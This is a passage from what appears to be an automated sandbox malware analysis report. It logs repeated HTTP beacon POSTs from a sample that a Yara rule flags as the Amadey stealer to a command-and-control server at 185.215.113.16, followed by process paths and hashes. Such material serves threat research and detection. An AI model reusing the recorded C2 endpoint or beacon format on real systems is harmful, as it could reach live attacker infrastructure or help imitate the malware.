                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:56.744843960 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:56.970771074 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.649769185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:57.083724976 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:57.802686930 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:57.803634882 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:58.032550097 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.649770185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:58.144578934 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:58.841969013 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:58.843313932 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:29:59.069298029 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.649771185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:29:59.190507889 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:29:59.910819054 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:29:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:29:59.911952972 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:30:00.151271105 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.649772185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:00.279174089 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:30:01.011519909 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:30:01.015243053 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:30:01.248735905 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.649773185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:01.362713099 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:30:02.074484110 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:30:02.075826883 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:30:02.313857079 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.649774185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:02.427949905 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:30:03.158406973 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.649775185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:03.167258978 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:30:03.871732950 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.649776185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:03.991398096 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:30:04.689481020 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.649778185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:04.698847055 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:30:05.413382053 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.649779185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:05.537329912 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:30:06.278338909 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.649780185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:06.288217068 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:30:07.007134914 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.649781185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:07.130489111 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:30:07.867284060 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.649782185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:07.884569883 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:30:08.591595888 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.649783185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:08.711709023 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:30:09.420989990 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 18:30:09.428148985 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 160
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 39 41 35 34 35 43 32 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEF9A545C2FDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                  Sep 26, 2024 18:30:09.657274008 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  62192.168.2.649784185.215.113.16803220C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 18:30:09.772277117 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 18:30:10.498146057 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 16:30:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:12:28:04
                  Start date:26/09/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0xd70000
                  File size:1'870'848 bytes
                  MD5 hash:A3A83347AE8FCDEE6EC20F6BA13311C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2262535378.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2219847128.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:12:28:07
                  Start date:26/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Imagebase:0x220000
                  File size:1'870'848 bytes
                  MD5 hash:A3A83347AE8FCDEE6EC20F6BA13311C9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
